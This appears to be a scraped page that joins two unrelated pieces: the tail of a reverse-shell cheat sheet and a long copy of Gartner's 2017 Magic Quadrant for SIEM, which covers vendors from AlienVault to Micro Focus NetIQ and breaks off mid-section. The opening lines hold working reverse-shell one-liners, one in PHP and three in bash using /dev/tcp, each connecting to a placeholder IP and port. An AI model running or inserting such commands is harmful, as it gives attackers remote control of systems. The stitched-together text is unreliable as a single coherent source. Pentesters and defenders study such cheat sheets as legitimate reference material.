5. php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

bash reverse shell

1. bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

2. exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

3. exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

 

 

Magic Quadrant for Security Information and Event Management

Magic Quadrant for Security Information and Event Management

Published: 04 December 2017 ID: G00315428

Analyst(s):

 

Summary

Security and risk management leaders are implementing and expanding SIEM to improve early targeted attack detection and response. Advanced users seek SIEM with advanced profiling, analytics and response features.

Market Definition/Description

This document was revised on 26 February 2018. The document you are viewing is the corrected version. For more information, see the Corrections page on gartner.com.

The security information and event management (SIEM) market is defined by the customer’s need to analyze event data in real time for the early detection of targeted attacks and data breaches, and to collect, store, analyze, investigate and report on event data for incident response, forensics and regulatory compliance. The vendors included in our Magic Quadrant analysis have products designed for this purpose, and they actively market and sell these technologies to the security buying center.

SIEM tools aggregate event data produced by security devices, network infrastructure, systems and applications. The primary data source is log data, but SIEM tools can also process other forms of data, such as NetFlow and network packets, or contextual information about users, assets, threats and vulnerabilities that can be found inside or outside the enterprise and that can be useful to enrich logs and raw data. All these data are normalized so that events, data and contextual information from disparate sources can be correlated and analyzed for specific purposes, such as threat management, network security event monitoring (SEM), user activity monitoring and compliance reporting. The tools provide real-time correlation of events for security monitoring, enable query and analytics for historical analysis, and offer other support for incident investigation and compliance reporting.

Magic Quadrant

Figure 1. Magic Quadrant for Security Information and Event Management

Research image courtesy of Gartner, Inc.

Source: Gartner (December 2017)

Vendor Strengths and Cautions

AlienVault

AlienVault competes in the SIEM market with two offerings: AlienVault Unified Security Management (USM) Appliance (physical or virtual) for on-premises deployment and AlienVault USM Anywhere, a cloud-based SaaS solution. USM Appliance includes file integrity monitoring (FIM) via the host intrusion detection system (IDS), NetFlow analysis and full-packet capture. USM Anywhere is designed to monitor cloud and on-premises environments from the AlienVault Secure Cloud. AlienVault also offers Open Threat Exchange (OTX), a free, community-supported threat intelligence sharing forum that integrates threat intelligence into USM. AlienVault Labs Threat Intelligence is a subscription service that updates correlation rules, reports, response templates, signatures for IDS and vulnerability checks in both USM Appliance and USM Anywhere. AlienVault is no longer offering its USM for Amazon Web Services (AWS) product, and customers of USM AWS have been migrated to USM Anywhere.

USM Anywhere became generally available in February 2017, and is the result of a from-scratch development effort. The focus of USM Anywhere is monitoring cloud environments, initially AWS and Microsoft Azure, although monitoring of on-premises technology is supported as well. The USM Anywhere architecture accommodates apps (AlienApps) to enable adding capabilities in a modular fashion. USM Anywhere and USM Appliance features and capabilities differ somewhat. AlienVault’s current plans are to continue to offer both USM Appliance and USM Anywhere. The pricing model for USM Appliance is based on the number of appliances required, available as a perpetual license or monthly subscription. USM Anywhere is sold as a monthly subscription, priced by the volume of data consumed.

STRENGTHS
  • USM Appliance and USM Anywhere provide several integrated security capabilities, including asset discovery, FIM, vulnerability assessment, and both host-based and network-based intrusion detection systems.
  • AlienVault provides content updates via its Threat Intelligence subscriptions, as well as community source intelligence, that are integrated into the monitoring, detection and reporting functions of USM Appliance and USM Anywhere.
  • Customers report that the security monitoring technologies included with USM offer a lower cost for more capabilities compared with products from most competitors in the SIEM space.
  • The pricing model for USM Anywhere and USM Appliance is straightforward and easy to understand, and the availability of monthly subscription pricing for USM Appliance offers flexibility.
CAUTIONS
  • There are differences in the capabilities of USM Appliance and USM Anywhere that may present potential buyers with trade-offs. For example, capturing NetFlow data is supported by USM Appliance, but not by USM Anywhere. USM Anywhere, however, can capture VPC flow logs from AWS. USM Appliance uses correlations to provide basic enrichment of event data with user context, and USM Anywhere uses a graph-based engine to support a basic user and entity behavior analytics (UEBA) capability focused on cloud environments.
  • USM Appliance has more limited support for cloud environments than USM Anywhere. For example, in AWS, USM Anywhere monitors CloudTrail, CloudWatch Classic Load Balancer, Application Load Balancer and Simple Storage Service (S3) access, plus logs for installed software, and provides vulnerability assessments. USM Appliance provides monitoring of Windows and Linux guests on AWS via an HIDS agent.
  • AlienVault’s target market is midsize enterprises and smaller organizations. As a result, enterprise-oriented features, such as role-based workflow, ticketing integrations, support for multiple threat intelligence feeds and advanced analytics capabilities, lag behind those of competitors that focus on enterprise customers.

BlackStratus

BlackStratus is a SIEM technology and service-focused vendor with solutions aimed at large enterprises, small or midsize businesses (SMBs), managed security service providers (MSSPs), and managed service providers (MSPs). The portfolio is composed of LOGStorm, SIEMStorm and CYBERShark. LOGStorm is a log and event management and reporting tool targeted at SMBs and MSSPs. It is available as a physical and virtual appliance. LOGStorm leverages a Vertica big data platform and stores both raw and normalized event data. SIEMStorm is a natively multitenant platform that is delivered as software, where components can be installed on a single physical or virtual server, or installed separately depending on the size and scope of the environment to be monitored. SIEMStorm includes core SIEM capabilities including real-time event management, correlation, analytics, workflow and incident response, and reporting. It is targeted at large enterprises or organizations with federated security monitoring requirements (e.g., across lines of business or child companies), as well as at MSSPs needing to support customers in a shared, multitenant environment. CYBERShark is a SIEM as a service aimed at MSPs and SMBs. It is delivered as a cloud-based solution, along with 24/7 Tier 1 security operations center (SOC) security monitoring and alerting services.

Recent enhancements of the platforms include a variety of new product integrations, in particular support for AWS, Azure, Office 365 and ServiceNow, as well as improvements to the user interface and back-end performance optimizations. Support for GE Digital (Wurldtech) OpShield was added to extend SIEMStorm to operational technology security monitoring use cases.

STRENGTHS
  • The architectures for SIEMStorm and LOGStorm are flexible for both deployment and expansion. All application components are multitenant out of the box.
  • Integrations added over the past 12 months extend support for popular service desk solutions, as well as SaaS and IaaS environments.
  • Support for OT data sources is now a native feature, albeit with limited support for OT security-based threat detection vendors, such as GE Digital (Wurldtech).
  • SIEMStorm includes a fully integrated incident and ticket management system based on the SANS Institute’s incident handling process.
CAUTIONS
  • Native advanced threat detection solutions, such as FIM, endpoint detection and response (EDR), network deep packet inspection, and network forensics, are not available. The vendor’s open API does allow for integration with a variety of third-party solutions.
  • Advanced analytics capabilities are very limited. BlackStratus indicates that expansion of analytics is planned over the next year.
  • Support for identity and access management (IAM) solutions is limited. User-based event monitoring is provided for Active Directory (AD) and a variety of web access management (WAM) solutions.
  • SIEMStorm’s workflow capabilities lack orchestration and automation features.
  • BlackStratus has a large MSSP and MSP customer base, but lacks visibility with Gartner’s enterprise and SMB end-user clients.

Dell Technologies (RSA)

RSA (a Dell Technologies business since the acquisition of EMC by Dell in September 2016) competes in the SIEM market via its RSA NetWitness Suite. The suite is composed of RSA NetWitness Logs and Packets, RSA NetWitness Endpoint, and RSA NetWitness Security Operations (SecOps) Manager. RSA NetWitness Suite is focused on real-time threat detection, incident response, forensics and threat hunting use cases leveraging network full-packet capture, security event and log data, NetFlow, and telemetry from endpoints. The architecture is composed of the RSA NetWitness Server along with Decoders (full-packet capture, logs, NetFlow and endpoint data collection); Concentrators (metadata aggregation and indexing); Event Stream Analytics (analytics for real-time monitoring and alerting); and Archivers (data and event archiving tier). There is a stand-alone management server for RSA NetWitness Endpoint. RSA NetWitness Suite offers flexible deployment options as it can be installed as software, physical and virtual appliances, and in hybrid configurations. On-premises as well as IaaS environments are supported. Scalability (both vertically and horizontally) is supported through the deployment of additional components (e.g., Decoders, Concentrators and Archivers). RSA NetWitness SecOps Manager, a module in the RSA Archer solution, adds advanced incident management workflow, operational playbooks, management dashboards and reporting. The solution is primarily licensed by volume (software model) or per appliance for Logs and Packets, and by number of agents for Endpoint. Both perpetual and term models are available.

Since mid-2016, RSA has added additional support for event and data collection within IaaS (AWS and Azure), support for deploying RSA NetWitness Suite components in AWS, and additional feature and functionality enhancements, such as the addition of RSA Live-delivered content packs focused on new users as well as advanced threat hunters, Trial Rules (allows rules to be demoed before being implemented in production), Endpoint agent support added for Linux and Mac, and expanded command-and-control behavior-based analytics. RSA NetWitness Suite 11, released in October 2017, provides a new user interface and enhancements to capabilities for investigation, incident management and identity insights.

STRENGTHS
  • RSA NetWitness Suite offers a single-solution approach for threat detection and event monitoring, investigation, and response across network traffic, endpoints and other security event and log data sources.
  • RSA NetWitness Suite’s focus on advanced threat detection, incident response, forensics and threat hunting makes it a viable solution for buyers with, or planning to deploy, a SOC and those looking for a single, integrated platform across teams.
  • RSA Live, a cloud-based service, provides a marketplace-type interface for RSA NetWitness content packs (threat detection rules, parsers, reports), threat intelligence and third-party integrations. Threat intelligence and content updates can be automated so they are seamless to users.
  • The RSA NetWitness Suite provides a flexible architecture that scales from a single appliance to complex n-tier deployments, which can span both on-premises and IaaS.
  • Out-of-the-box threat intelligence includes access to over two dozen threat feeds, including intelligence from RSA’s FirstWatch research team and incident response activities, and RSA Live provides crowdsourced threat intelligence from RSA NetWitness customers.
CAUTIONS
  • RSA NetWitness Suite’s user interface is basic compared to competing SIEM solutions. RSA indicates that a new UI is included with version 11, released in October 2017.
  • RSA NetWitness Logs and Packets lags behind similar SIEM solutions in UEBA capabilities. Integrations are available with third-party UEBA vendors.
  • RSA NetWitness Suite’s incident management capabilities are lightweight. Buyers looking for richer workflow capabilities need to purchase RSA NetWitness SecOps Manager.
  • Native security orchestration and automation capabilities are limited, but out-of-the-box integrations with most third-party security operations, analytics and reporting (SOAR) solutions are available.

EventTracker

In October 2016, EventTracker merged with Netsurion, a provider of managed security services, and EventTracker continues as a subsidiary with its own brand. EventTracker targets its SIEM software and service offerings primarily at midsize and government organizations with security event management and compliance reporting requirements. EventTracker Enterprise software is available, with licensing based on the number of event sources. Standard components include correlation, alerting, behavior analysis, reporting, dashboards and a large number of event source knowledge packs. Options include configuration assessment, change audit FIM, ntopng, flow analyzer, honeynet, threat intelligence feeds and the analyst data mart. Service offerings include SIEMphonic co-managed SIEM aligned to run, watch, tune and comply with activities performed on schedules ranging from daily to weekly. Collection from and deployment in AWS and Azure are natively supported.

In the past year, EventTracker has added a security scorecard dashboard that provides a risk-prioritized view of security incidents and a deception component (honeynet) offered as a managed service. Support for NIST SP 800-171 and the EU’s General Data Protection Regulation (GDPR), as well as 23 NYCRR 500 compliance, was also introduced.

Midsize businesses requiring a software-based solution for log and event management, compliance reporting, and operations monitoring via on-premises or cloud-hosted SIEM with optional, flexible monitoring services should consider EventTracker.

STRENGTHS
  • EventTracker is easy to deploy and maintain, and offers compliance and use-case-specific content with prebuilt alerts, correlation rules and reports.
  • EventTracker’s software pricing model is based on the number of event sources and is thus relatively straightforward for potential customers to understand. Perpetual license and annual subscription pricing are offered.
  • EventTracker’s SIEMphonic managed SIEM services aligned with run, watch, tune and comply activity are a differentiator, and address the needs of its target market.
CAUTIONS
  • EventTracker’s SIEMphonic managed SIEM services offerings are based on data volume (not event source count, which is the model for the software), thus potential buyers comparing options will need to make different calculations when developing assumptions about the scope and growth of the monitored environment.
  • EventTracker’s advanced threat detection features are basic, Windows-centric and, in the case of flow and packet capture, not cleanly integrated into the core product. Integrations with third-party advanced threat detection/response technologies are not available.
  • EventTracker’s capabilities for application monitoring are more limited than SIEM products that target enterprise deployments, as they lack integration with major packaged applications.
  • Full incident management, including ticketing, requires an external solution. Several integrations via email and XML are supported.

Exabeam

Exabeam Security Intelligence Platform is a collection of components that collectively deliver the Exabeam SIEM solution that was introduced in February 2017. The platform is built on a variety of big data technologies, including Elastic, Hadoop, Kafka and Spark. Data management (collection, parsing, indexing and storage) is provided by Log Manager, which also includes agent-based collectors that can collect logs from local resources or from cloud-based applications using RESTful APIs. Advanced Analytics, also sold as Exabeam’s stand-alone UEBA tool, provides analytics functionality via a collection of both expert rules as well as behavior- and machine learning (ML)-based analytics. Incident Responder provides workflow, case management, security orchestration and automation capabilities. Threat Hunter is a search and investigation tool oriented toward analysts doing incident investigations and analyses, or threat-hunting-oriented activities. Threat Hunter provides user-based timelines rather than focusing on standard query and search approaches. Customers requiring connecting to IaaS and SaaS can purchase Exabeam’s Cloud Connectors, which are prebuilt API connectors for a variety of services, such as several AWS services, Office 365, SharePoint, Box and Salesforce. Exabeam’s components can be run on dedicated appliances (two versions are currently available), and installed as software or virtual appliances.

STRENGTHS
  • Exabeam’s licensing approach is based on the number of users in an organization, rather than the velocity or volume of event, log and contextual data analyzed.
  • Exabeam has established itself as complementary to existing SIEM solutions through its UEBA solution, which forms the core of the vendor’s solution portfolio. Advanced Analytics is included as part of the core platform, rather than as an add-on to complement traditional signature- and correlation-based rules.
  • Customers can customize the SIEM platform by selecting the components to meet their requirements (e.g., starting out with Log Manager and Advanced Analytics and adding Incident Responder and Threat Hunter as buyer experience and maturity in security monitoring improve).
  • Exabeam’s architecture is big data-oriented and supports a variety of deployment options (physical and virtual, and on-premises, IaaS or hybrid) and offers easy horizontal scalability through the addition of more appliances.
CAUTIONS
  • Most of Exabeam’s full platform, except for Advanced Analytics (which has been available for several years as a stand-alone UEBA tool, complementing SIEM), does not yet have widespread adoption and use compared to most SIEM solutions on the market.
  • Predefined reporting capabilities against industry and regulatory requirements are nascent, given the focus on user-based monitoring. Reports can be created from searches and saved as dashboards, or created from visualization capabilities for viewing and exporting.
  • Exabeam’s platform lacks native network traffic analysis capabilities, although it supports a variety of third-party solutions. Flow data cannot yet be analyzed, but is available for ingestion and searches as part of incident investigations.

FireEye

FireEye is a new entrant in the SIEM Magic Quadrant. FireEye’s SIEM offering is Threat Analytics Platform (TAP), which is delivered as a service leveraging AWS. TAP provides real-time security analytics, investigative threat hunting, monitoring and data management, and storage, with data segregated on a per-customer basis. Integrated threat intelligence is provided by in-house iSIGHT security researchers and Mandiant incident responders. Both multitenant as well as single-instance versions are supported.

TAP customers deploy a Cloud Collector appliance on their network to aggregate and securely transmit logs to TAP. Cloud Collector can also be deployed as a network security monitoring appliance that generates its own network metadata events as well as providing selective full-packet capture. Cloud Collector can be deployed as software, an ISO installer that supports bare-metal hardware or virtualized environments, or a physical appliance. Licensing is based on events per second (EPS) and data storage/retention requirements (13 months is the default.)

STRENGTHS
  • TAP’s as-a-service delivery model gets strong marks for ease of deployment. There is no technology for customers to manage and only Cloud Collector appliances to deploy. There is out-of-the box support for a large variety of event sources. There are more than 2,300 predefined rules for alerting, which are updated or added continually.
  • Threat intelligence from FireEye iSight, as well as curated open-source feeds, is included with the service.
  • Guided investigation support for incidents and events includes best-practice suggestions and predefined searches.
  • FireEye provides an optional 24/7 monitoring service (FireEye as a Service) for customers that lack the resource to staff full-time operations.
CAUTIONS
  • TAP currently includes a limited number of report templates, with PCI and HIPAA templates available for compliance reporting.
  • Integrations with enterprise configuration management databases (CMDBs) and AD, support for STIX and TAXII, and more advanced orchestration and automation features are available only with the additional purchase of FireEye Security Orchestrator.
  • Potential customers should closely evaluate TAP’s current capabilities for advanced analytics against the use cases they want to support. User behavior analytics and analytics covering long time frames are not available.

Fortinet

FortiSIEM, acquired from AccelOps in 2016, is a component of Fortinet’s Security Fabric framework that provides traditional SIM and SEM capabilities, complemented by a built-in CMDB, application and system performance monitoring capabilities, and agent-based FIM. Fortinet positions FortiSIEM for MSPs, telecommunications providers and MSSPs that use or support other Fortinet solutions, in addition to security operations buyers in large enterprises, government and education. FortiSIEM has been adopted by organizations where security and network operations monitoring are delivered from a unified solution, as well as by MSPs and MSSPs that take advantage of the full FortiSIEM stack.

FortiSIEM’s architecture is composed of four components (Supervisors, Worker, Collector and Report Server) that are deployed via virtual appliances supported across a variety of on-premises (ESX, KVM, Hyper-V, Zen and OpenStack) and IaaS platforms (AWS and Azure), and can be deployed as a single appliance or stand-alone components for scalability. Data management leverages a mix of big data (NoSQL) and RDBMS. Managed SIEM as a service is also available to end users as well as to MSPs and MSSPs. Physical appliance options and a remediation library for integrations with third-party tools are expected later in 2017. Licensing is primarily based on the number of data sources, EPS and agents deployed.

Over the past 12 months, Fortinet has added additional integrations within the Fortinet Security Fabric, as well as adding risk-based scoring for devices; STIX and TAXII support for improved threat intelligence capabilities; user activity auditing for SaaS such as Office 365 and G Suite; and the initial move to an HTML5-based UI.

STRENGTHS
  • FortiSIEM provides a single platform for organizations looking to support multiple environments (on-premises physical and virtual, SaaS, and IaaS), use cases and teams across IT (network operations, security operations and application performance monitoring [APM]).
  • A built-in autodiscovery feature and an integrated CMDB capability support use cases across IT, network operations and security operations.
  • FortiSIEM’s scope of reporting covers a wide variety of compliance requirements and best practices for both security operations and network operations across several geographies.
  • Midmarket organizations, especially those leveraging other Fortinet products, where security responsibilities are federated out to teams like network operations, will benefit from the unified platform available with FortiSIEM, which includes native workflow and the ability to perform basic automated response activities.
CAUTIONS
  • FortiSIEM lags behind the competition in advanced analytics capabilities and easy integration (e.g., through an app store interface) with third-party technologies, such as EDR, UEBA, and security orchestration and automation tools.
  • Out-of-the-box threat intelligence is not provided, but support for Fortinet’s FortiGuard threat intelligence platform, as well as integrations with third-party threat feeds, is provided.
  • FortiSIEM has limited visibility with Gartner clients procuring SIEM solutions.

IBM

IBM QRadar Security Intelligence Platform is composed of QRadar SIEM at the core, with additional components providing complementary security monitoring and operations capabilities, such as log management (Log Manager), network monitoring (QFlow, Network Insights and Incident Forensics), vulnerability management (Vulnerability Manager) and risk management (Risk Manager). IBM positions QRadar as an on-premises solution available via a stand-alone or distributed architecture, SIEM as a service (QRadar on Cloud) or as co-managed QRadar in partnership with IBM Managed Security Services. QRadar’s on-premises architecture is deployed via physical or virtual appliances (for on-premises or IaaS), software, and hosted cloud. The core components include Event Collectors and Event Processors, QFlow Collectors and Processors, Data Nodes, and Consoles, in addition to the premium components. Advanced threat detection and response capabilities include UEBA functionality (the QRadar UBA App) supported by ML-based analytics (QRadar Machine Learning Analytics app), threat intelligence provided by IBM’s X-Force Threat Intelligence feed, QRadar Advisor with Watson app and Resilient Incident Response Platform for incident response and orchestration and automation capabilities. IBM QRadar is licensed primarily by EPS and flows per second (FPS), and premium modules and apps are charged separately.

Over the past 12 months, IBM has introduced a variety of new capabilities, including user behavior analytics (UBA), Machine Learning Analytics app, Advisor with Watson app, Network Insights and platform enhancements around user interfaces and usability features, and data storage compression and optimization. Integrations with partners have been expanded through additions to QRadar App Exchange. IBM Resilient (an incident response tool) is now being offered as a premium service alongside QRadar engagements.

STRENGTHS
  • QRadar supports both midsize and large enterprises that require core SIEM capabilities, in addition to those looking for a unified platform that covers a wide range of security monitoring and operational technologies.
  • QRadar provides a flexible architecture that can support a variety of environments, including hybrid monitoring options across on-premises and IaaS.
  • QRadar App Exchange provides an improved user experience for integrating premium content, content packs and third-party security controls into the QRadar Console and Security Intelligence Platform compared to many competitors.
  • Buyers looking to implement advanced analytics and user-based monitoring will benefit from the free UBA and ML apps provided with the core SIEM product.
  • QRadar offers a single view across real-time and historic network-based event sources through the correlation of log data, NetFlow, QFlow, deep packet inspection (via Network Insights) and full-packet capture.
  • There is widespread availability of managed service support for on-premises QRadar deployments from third parties (and from IBM for large accounts), and QRadar is also available in a hosted SIEM model.
CAUTIONS
  • Endpoint monitoring for threat detection and response, or basic file integrity, requires use of third-party technologies. IBM has positioned its BigFix product as a component in this space, especially for security response activities, but there has been very little interest from Gartner clients for this approach.
  • Gartner clients that have deployed or are considering QRadar have not expressed much interest in QRadar Advisor with Watson.
  • While IBM has introduced its UBA and ML apps, UBA features lag behind the UEBA-centric SIEM vendors. Integrations with several UEBA vendors are supported through QRadar App Exchange.
  • IBM Resilient still lacks native integration into the QRadar platform. Integration is available through QRadar App Exchange.
  • Customer feedback on the QRadar architecture is generally positive, but for buyers requiring a multicomponent-based architecture, the number of licensable components and options required generates confusion as part of the acquisition and purchase process.

LogRhythm

LogRhythm Threat Lifecycle Management Platform provides core SIEM capabilities, in addition to optional add-ons for network and host monitoring. LogRhythm’s SIEM solution consists of several components that can be run from a single appliance or separately as discrete components — Data Collector, Data Processor, Data Indexer, AI Engine, Platform Manager and WebUI Services. System Monitor Agents (available for Windows, Unix and Linux platforms and in two flavors — Pro and Lite) provide FIM functions, but can also act as event forwarders to Data Collectors. Network Monitor provides network and application traffic visibility, as well as selective packet capture for forensic purposes. LogRhythm’s SIEM can be deployed in a variety of ways — as software, or as physical or virtual appliances, either as a single appliance solution or for the various discrete components to support a variety of architectural approaches. LogRhythm can be deployed on-premises, in IaaS and in hybrid operating models. Multitenancy for MSSP buyers is also natively supported. LogRhythm SIEM is a velocity-based license approach measured by messages per second (MPS), and licenses are available as perpetual or term. Enterprise license agreements are also available. Physical appliances are available for additional charge. System Monitor is priced per host and Network Monitor is priced per gigabits throughput.

In the past 12 months, LogRhythm has made usability improvements across a variety of functions and features, including case management, workflow and response with the SmartResponse feature, improved user monitoring analytics, delivered enhancements to System Monitor and Network Monitor (including expansion into OT environment monitoring), usability improvements for real-time monitoring, and content updates delivered via AI Engine.

STRENGTHS
  • LogRhythm provides a strong platform for organizations that want a contained platform that includes core SIEM capabilities enhanced by complementary host and network monitoring capabilities, in a solution that can scale from a single appliance up to n-tier architectures.
  • LogRhythm’s out-of-the-box content (and updates delivered to the AI Engine component), along with a powerful user interface, provides a strong real-time monitoring experience for users.
  • SmartResponse allows users to integrate preconfigured automated response activities into their alert, investigation and response activities, either fully automated or semiautomated (e.g., manually initiated).
  • Organizations considering security monitoring of ICS/SCADA or OT environments, or looking to merge security event monitoring of their IT and OT environments, should consider LogRhythm.
  • Gartner clients, particularly midsize and smaller enterprise organizations, report that the simplified deployment model and support by LogRhythm via the Core Deployment Service is useful. Customers with specific use cases indicate that the Analytics Co-Pilot Service is also useful to speed up implementation times.
CAUTIONS
  • LogRhythm lags the UEBA-centric SIEM vendors in ML-driven analytics. The vendor has announced a cloud-based advanced analytics capability called CloudAI, which was released to a limited number of users in early 2017, with general availability targeted for 4Q17.
  • There is no application store for easily integrating third-party solutions like several other competing products, and the platform’s APIs are less open to third parties to facilitate easier integrations, although LogRhythm has a partner program to facilitate custom integrations.
  • LogRhythm supports a limited number of threat intelligence feeds out of the box, although users can add custom STIX/TAXI feeds with the LogRhythm TIS utility, and LogRhythm provides API-based support for other formats. Buyers with third-party threat intelligence feeds should confirm support with LogRhythm.
  • A few customers have expressed concerns about LogRhythm’s ability to scale to support very high event volume environments. Buyers with those environments should validate LogRhythm’s ability to support anticipated event and data volumes.
  • Some Gartner clients have raised concerns about the use of Windows as the underlying platform for components in the overall architecture (the Data Indexer is Linux-based), especially around maintaining patch and hotfix currency. Buyers should follow patching best practices and monitor LogRhythm for patch advisories.

ManageEngine

Log360 is the SIEM offering from ManageEngine, a division of Zoho. ManageEngine Log360 is composed of three components — EventLog Analyzer, which provides core SEM and SIM features including event log management, correlation-based analytics, and management/UI for reports, dashboards and log search functionality; ADAudit Plus, which provides real-time monitoring and auditing for AD; and Cloud Security Plus, which manages log event data from public cloud environments. EventLog Analyzer is offered in two versions: Premium is for single instance deployment, and Distributed, which uses a centralized admin server, is for large organizations or MSPs/MSSPs that need to scale horizontally beyond a single EventLog Analyzer instance (e.g., multitenant use cases or a single, geographically distributed organization). ADAudit Plus is offered in two versions — Standard and Professional — depending on the features required. Log360 is only available as a software version, but can be installed into virtual environments. It is licensed by the software components, version, and number of event log and data sources.

Over the past 12 months, ManageEngine has added support for monitoring AWS and Azure public cloud services, enhanced analytics with field-level correlation, improved incident response capabilities and integrations with service desk solutions. It has also added out-of-the-box threat intelligence feeds and improved auditing of AD (e.g., AD Federation Services [ADFS] and AD Lightweight Directory Services [ADLDS]), among other enhancements.

STRENGTHS
  • Either ManageEngine Log360 or EventLog Analyzer is a good choice for existing ManageEngine customers looking for an integrated solution, as well as for organizations looking for a simple, cost-effective SIEM solution.
  • ManageEngine addresses heavy auditing and compliance capabilities. Over 1,200 predefined reports, including various compliance-focused ones, are available out of the box.
  • ADAudit Plus provides stand-alone or integrated monitoring of AD for identity and access governance requirements.
  • ManageEngine’s architecture and deployment are straightforward and easier to deploy than many SIEM solutions. Log360 includes a wide range of out-of-the-box correlation rules as well as threat intelligence feeds. Organizations primarily using Windows are well-supported with built-in log source identification and integration capabilities.
CAUTIONS
  • EventLog Analyzer only provides basic SIEM threat detection functionality. Support is lacking for third-party threat intelligence endpoints and for network-based traffic (e.g., NetFlow).
  • Log360 integrates EventLog Analyzer and ADAudit Plus; however, analysts are required to use two different interfaces to perform various activities, such as monitoring for new incidents, investigations and reporting.
  • Scalability of the platform may present challenges for larger organizations. Buyers should confirm that event and data volumes, and AD sizes, are supported. Horizontal scaling is supported, but n-tier scalability may be a challenge.
  • ManageEngine buyers report difficulty working with remote support staff after purchase.
  • ManageEngine has little visibility with Gartner clients for SIEM use cases.

McAfee

McAfee Enterprise Security Manager (ESM) provides core SIEM functionality, including a web-based user interface, a parsed event database, reporting capabilities and central management of other components in the solution. The other components in the solution include Event Receiver (ERC), which provides event and flow collection, and event parsing and normalization; Enterprise Log Manager (ELM), which collects, manages and stores all raw events; Advanced Correlation Engine (ACE), which provides real-time analytics using four types of correlation approaches (rule-based, risk-based, statistical and historical); and Enterprise Log Search (ELS) for log search functionality. Buyers can also purchase the McAfee Database Event Monitor (DEM), which provides real-time discovery and transaction-level database monitoring; Application Data Monitor (ADM), which provides application-level (e.g., Layer 7) decoding and inspection of network traffic; and Global Threat Intelligence (GTI), a threat intelligence feed produced by McAfee Labs. The McAfee SIEM can be deployed as physical or virtual appliances, either as an all-in-one offering (where ESM, ELM and ERC components are on a single appliance) or as individual, discrete components. Physical and virtual appliances can be run together in hybrid-type deployments. The flexible deployment options support n-tier architectures. McAfee’s SIEM solution is licensed as a perpetual model, primarily by maximum event volume per appliance as measured in EPS. Physical appliances are an additional charge. McAfee ADM is licensed by bandwidth in gigabytes per second and GTI is licensed per ESM server deployed.

Over the last year, McAfee has primarily focused on transitioning the ESM underlying architecture to a big data-based approach that leverages technologies like Elastic and Kafka, which is supported with the release of a new generation of physical appliances (although many earlier appliance models support the new architecture too). Additionally, the user experience was also addressed via a new HTML5-based interface that included improved visualizations and workflow capabilities (although the interface is not yet 100% available across the entire solution). Forensics capabilities were improved via the release of ELS.

STRENGTHS
  • McAfee’s architecture and licensing approach, especially for buyers looking for turnkey appliances (both physical and virtual), simplifies purchases and deployments.
  • Customers of other McAfee products, as well as the large set of vendors that are part of the McAfee Security Innovation Alliance, will benefit from native integrations as well as interoperability provided by the Data Exchange Layer (DXL) framework.
  • Organizations that require SEM of OT environments (ICS/SCADA) should consider ESM and ADM due to a long history of supporting OT environments (e.g., being able to run as a “one-way diode”) and through specific prepackaged content (rules, dashboards and reports).
  • Customer satisfaction, with both the product and support, over the past 12 months has improved compared to previous periods.
CAUTIONS
  • McAfee lacks advanced, machine-driven analytics capabilities, compared to leading competitors. The planned changes to the platform to run on a big data architecture should enable development of these capabilities.
  • McAfee ESM has workflow and case management, but is lacking in automation and orchestration capabilities. Support for many third-party SOA tools is available.
  • Customers report ongoing concerns about options for training and education on the ESM platform.

Micro Focus (ArcSight)

In September 2017, Hewlett Packard Enterprise (HPE) and Micro Focus closed a business transaction that resulted in the ArcSight SIEM product becoming part of the Micro Focus business. ArcSight Enterprise Security Manager (ESM) is the core component of ArcSight’s SIEM solution. Data collection and management is enabled by ArcSight Data Platform (ADP) using HDFS, Kafka, and Logger and Connectors (both prepacked SmartConnectors and customizable FlexConnectors). The ArcSight Management Center (ArcMC) handles configuration management. ESM provides real-time analytics and monitoring, search, reporting, case management, and workflow. ArcSight ESM Express is available for single, all-in-one system implementations. ArcSight Investigate, built on top of Micro Focus Vertica, is a purpose-built big data and analytics platform that enables data search for incident investigation as well as threat hunting uses. UBA is possible via a repackaged version of Securonix Bolt that provides advanced analytics-based user monitoring capabilities (peer group analysis and ML). DNS Malware Analytics (DMA) is a SaaS-delivered solution that applies advanced analytics that use DNS events to detect malware-infected hosts. DMA will be incorporated into the next release of ArcSight Investigate. The solution can be deployed as a physical appliance or as software, with bare-metal, virtual and IaaS options supported. Multitenant functionality is native to the platform.

STRENGTHS
  • ArcSight has a large installed base of customers using the SIEM product for large, complex SOC environments and for more basic log collection use cases. There is widespread professional services and third-party monitoring support for ArcSight.
  • ArcSight supports acquisition and parsing of data from a broad range of sources, connector customization that allows normalization of a broad range of event sources and an open platform that enables structured data to be used outside of the ArcSight solution.
  • ArcSight can be extensively customized to support threat management and compliance-focused use cases. ArcSight’s robust API enables extensive integrations in SOC environments.
CAUTIONS
  • Prior to the acquisition by Micro Focus, ArcSight was updating several elements of its architecture. ArcSight users and prospective customers should seek assurances that Micro Focus will meet commitments for product feature/function improvements and support. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in ArcSight, leveraging the combined expertise and technology from the legacy companies for the foreseeable future.
  • Licensing may be problematic for buyers, with volume-based (for ADP), velocity-based (for ESM) and user-based (for UBA) pricing schemes. Current customers that are converting from legacy licensing models to new licenses and the ADP architecture have reported issues with license conversion complexity and costs. To address these concerns, Micro Focus has implemented changes to its license model that include a pricing option that is free of data restrictions.
  • The ArcSight architecture is undergoing changes, with the introduction of ADP, Investigate and other components to support scalable, richer analytics and response, while at the same time supporting legacy functionality. As a result, customer choices regarding the deployment of some elements of the solution can result in duplication of data.

Micro Focus (NetIQ)

NetIQ Sentinel is a SIEM solution from Micro Focus. Sentinel Enterprise is the full SIEM solution that provides SIM and SEM capabilities to support both threat detection- and compliance-oriented use cases. Sentinel for Log Management provides log management, search and reporting capabilities, and can be upgraded to Enterprise. Additional components in the platform include Identity Tracking (a combined solution of Micro Focus Identity Manager and Sentinel with user-monitoring-focused content), Change Guardian (for host-based change and file monitoring), Exploit Detection (a threat and vulnerability management intelligence subscription), Secure Configuration Manager, and Aegis (for enhanced automation to the native Sentinel iTrace workflow). Sentinel can be deployed as software on Linux or as a virtual appliance on VMware, Hyper-V and Xen, and allows for flexible horizontal scaling. Sentinel is licensed based on EPS, event sources and optional components. Multitenant capabilities are natively supported.

